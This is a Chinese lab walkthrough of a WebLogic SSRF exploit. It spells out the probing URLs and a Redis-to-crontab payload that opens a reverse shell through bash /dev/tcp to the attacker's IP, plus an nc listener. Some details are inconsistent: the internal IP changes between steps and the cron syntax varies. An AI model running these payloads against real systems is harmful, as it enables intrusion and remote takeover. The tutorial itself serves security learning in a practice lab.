Weblogic SSRF漏洞利用

漏洞产生原因：

是指Web服务提供从用户指定的URL读取数据并展示功能又未 对用户输入的URL进行过滤，导致攻击者可借助服务端实现访问其本无权访问的URL。 攻击者无权访问的URL主要是内网，而对于不是Web服务的其他端口反回的一般是端口对应的服务的banner信息， 所以SSRF的一大利用是探测内网端口开放信息。（所以SSRF归类为信息泄漏类型）

漏洞利用：

1.1、直接访问：http://ip:7001/uddiexplorer/ ,SSRF漏洞存在于：http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp

1.2、向服务器提交以下参数： ?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

1.3、当我们访问一个存在的端口时，比如： http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7001

会爆出如下错误： 1.4、当我们访问一个不存在的端口时，比如： http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://127.0.0.1:7000 会爆出如下错误： 我们可以根据返回的不同状态信息，来判断内网的IP是否存在以及对应端口是否开放，同时加以利用

因为这是个靶场所以我们已经知道该网站的内网，所以就省去了探测内网IP步骤。 内网IP：172.18.0.2: 手工一个个端口探测太麻烦，所以可以使用python脚本批量检测 内网端口，不太精通python可以百度 得到内网Redis服务端口号为：172.18.0.2:6379 访问内网返回如下： 1.5、打开kali，将反弹shell脚本写入/etc/crontab，crontab就是linux下的一个定时执行事件的一个程序，不懂的小伙伴可以自行谷歌：

set 1 "\n\n\n\n* * * * root bash -i >& /dev/tcp/xx.xx.xx.xx[这里是你自己的公网IP]/8888[这里是你监听的端口] 0>&1\n\n\n\n" config set dir /etc/config set dbfilename crontab save

1.6、kali端口监听：nc -lvnp 8888 1.7、打开Burip Suite修改请求包 因为我们是通过GET来发送命令的，因此要将上面的命令进行URL编码，同时我们还要制定一个要写入的文件，这里我就叫做test了，最终的URL如下： ?operator=http://172.21.0.2:6379/test set 1 "\n\n\n\n* * * * * root bash -i >& /dev/tcp/xxx.xxx.xxx.xxx/8888 0>&1\n\n\n\n" config set dir /etc/ config set dbfilename crontab save aaa

发送后返回结果如下：

1.8、回到kali会看到终端getshell